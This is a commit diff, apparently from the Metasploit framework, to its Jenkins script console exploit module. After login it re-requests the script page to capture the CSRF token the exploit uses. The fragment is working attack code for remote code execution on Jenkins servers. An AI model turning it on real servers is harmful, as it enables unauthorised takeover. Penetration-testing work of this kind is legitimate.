Retry the script page request to get the token

zeroSteiner · zeroSteiner · commit 005baa7f7ec1 · 2014-10-19T14:04:16.000-04:00
After logging in to Jenkins the script console page
needs to be requested again to get the CSRF token.
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -136,7 +136,6 @@ def linux_stager
     @to_delete = "/tmp/#{file}"
   end
 
-
   def exploit
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
@@ -161,15 +160,18 @@ def exploit
       })
 
       if not (res and res.code == 302) or res.headers['Location'] =~ /loginError/
-        fail_with(Failure::NoAccess, 'login failed')
+        fail_with(Failure::NoAccess, 'Login failed')
       end
       sessionid = 'JSESSIONID' << res.get_cookies.split('JSESSIONID')[1].split('; ')[0]
       @cookie = "#{sessionid}"
+
+      res = send_request_cgi({'uri' => "#{@uri.path}script", 'cookie' => @cookie})
+      fail_with(Failure::Unknown) unless res and res.code == 200
     else
       print_status('No authentication required, skipping login...')
     end
 
-    if (res.body =~ /"\.crumb", "([a-z0-9]*)"/) 
+    if (res.body =~ /"\.crumb", "([a-z0-9]*)"/)
         print_status("Using CSRF token: '#{$1}'");
         @crumb = $1;
     end
